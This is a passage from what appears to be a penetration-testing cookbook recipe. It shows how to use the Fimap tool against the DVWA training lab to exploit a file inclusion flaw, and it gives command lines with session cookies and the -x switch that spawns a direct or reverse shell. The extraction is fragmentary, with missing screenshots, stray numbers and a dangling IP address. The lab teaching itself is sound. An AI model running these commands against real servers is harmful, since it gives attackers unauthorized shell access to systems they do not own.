In the very first recipe, the Burp Scanner also identified the file path travel vulnerability. In this recipe, we will learn how to use Fimap to exploit the file path traversal vulnerability.
Fimap is a Python tool that can help in finding, preparing, auditing and finally exploiting local and remote file inclusion bugs in web applications automatically.
To step through this recipe, you will need the following:
For this recipe, you need to perform the following steps:
http:/dvwa.hackhunt.com/dvwa
and log in with the default credentials. Click on File Inclusion from the left-hand side menu, as shown in the following screenshot:
fimap
, which will show the version and author information, as shown in the following screenshot:
fimap -u 'http://172.17.0.2/dvwa/vulnerabilities /fi/?page=include.php' --cookie="security=low; PHPSESSID=b2qfpad4jelu36n6d2o5p6snl7" --enable-blind
-x
at the end in order to go ahead and exploit this file inclusion and get us a shell of the server, as shown here: fimap -u http://dvwa.hackhunt.com/dvwa/vulnerabilities /fi/?page=include.php --cookie="PHPSESSID=376221ac6063449b0580c289399d89bc; security=low" -x
1
as our domain is dvwa.hackhunt.com
, as shown here:
1
, as shown in following screenshot:
1
is to spawn a direct shell and the second is to create a reverse shell using the pentest monkey script. For our demonstration, we will use 1
, as shown in the following screenshot:
In this recipe, we used Fimap to exploit local and remote file inclusion and get shell access on the server. In this recipe, we used the following switches:
-u
: This indicates the target URL.--cookie
: Since our point of injection was after the authentication, we had to use this option in order to set cookies so that Fimap can access the injection point.--enable-blind
: This switch is very helpful when Fimap isn't able to detect something or if there are no error messages appearing. Note that this mode will cause lots of requests compared to the-x
: This is used to exploit the remote file inclusion vulnerability and spawn a shell automatically.3.144.116.159